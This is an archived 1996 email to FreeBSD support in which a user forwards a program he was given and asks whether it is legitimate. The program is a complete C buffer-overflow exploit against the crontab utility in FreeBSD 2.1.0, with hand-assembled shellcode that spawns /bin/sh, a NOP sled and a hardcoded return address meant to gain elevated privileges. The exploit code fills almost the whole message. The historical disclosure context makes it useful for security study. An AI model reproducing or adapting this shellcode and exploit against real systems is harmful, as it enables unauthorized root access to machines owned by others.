Date: Mon, 16 Dec 1996 08:54:18 -0800 From: James Bass <james@fastrans.net> To: support@freebsd.org Subject: security risk? Message-ID: <3.0.32.19961216085418.006997bc@mail.fastrans.net>
next in thread | raw e-mail | index | archive | help
Hello.. I run multiple FreeBSD systems running 2.1.5 or greater on all of
them... I love it! It is the best, but.... Somone gave me this, and just
out of curiosity, I wanted to know if it was legitimate or not.... It is
allegedly a crontab bug...
>/* ---------------------------- CUT HERE
----------------------------------- */
>/*
*/
>/* Hi !
*/
>/* This is buffer overflow exploit for crontab bug (FreeBSD 2.1.0).
*/
>/* If you have any problems with it, drop me a letter.
*/
>/* Have fun !
*/
>/*
*/
>/*
*/
>/* ----------------------
*/
>/* ---------------------------------------------
*/
>/* ----------------- Dedicated to my beautiful lady
------------------ */
>/* ---------------------------------------------
*/
>/* ----------------------
*/
>/*
*/
>/* Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
*/
>
>#include <stdio.h>
>main()
>{
>#define length 353
> int i,j;
> unsigned long start_addr;
> char *env[]={NULL};
> char param_string[length];
> char code_string[]=
> {
> "\xeb\x2a" /* jmp cont
*/
>
>/* geteip: */ "\x5d" /* popl %ebp
*/
> "\x55" /* pushl %ebp
*/
> "\xfe\x4d\xe7" /* decb
0xffffffe7(%ebp) */
> "\xfe\x4d\xeb" /* decb
0xffffffeb(%ebp) */
> "\xfe\x4d\xec" /* decb
0xffffffec(%ebp) */
> "\xfe\x4d\xed" /* decb
0xffffffed(%ebp) */
> "\xff\x45\xef" /* incl
0xffffffef(%ebp) */
> "\xfe\x4d\xf4" /* decb
0xfffffff4(%ebp) */
> "\xc3" /* ret
*/
>
>/* 0xffffffe0(%ebp): */ "/bin/sh"
>/* 0xffffffe7(%ebp): */ "\x01"
>
>/* execve: */ "\x8d\x05\x3b\x01\x01\x01" /* leal
0x3b,%eax */
> "\x9a\xff\xff\xff\xff\x07\x01" /* lcall
0x7,0x0 */
>
>/* cont: */ "\xc7\xc4XXXX" /* movl
$0xXXXXXXXX,%esp */
> "\xe8\xcb\xff\xff\xff" /* call
geteip */
> "\x81\xc5\xef\xff\xff\xff" /* addl
$0xffffffef,%ebp */
> "\x55" /* pushl %ebp
*/
> "\x55" /* pushl %ebp
*/
> "\x81\xc5\xf1\xff\xff\xff" /* addl
$0xfffffff1,%ebp */
> "\x55" /* pushl %ebp
*/
> "\xe8\xd4\xff\xff\xff" /* call
execve */
> };
>
> for(i=0;i<length-1;param_string[i++]='\x90'); param_string[length-1]='\0';
> start_addr=0xefbfddf0;
> *( (unsigned long*) strstr(code_string,"XXXX") )= start_addr;
> strncpy(¶m_string[200],code_string,strlen(code_string));
> *( (unsigned long*) ¶m_string[348])= start_addr;
>
> execle("/usr/bin/crontab","/usr/bin/crontab",param_string,NULL,env,NULL);
>
>}
>/* ---------------------------- CUT HERE
----------------------------------- */
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?3.0.32.19961216085418.006997bc>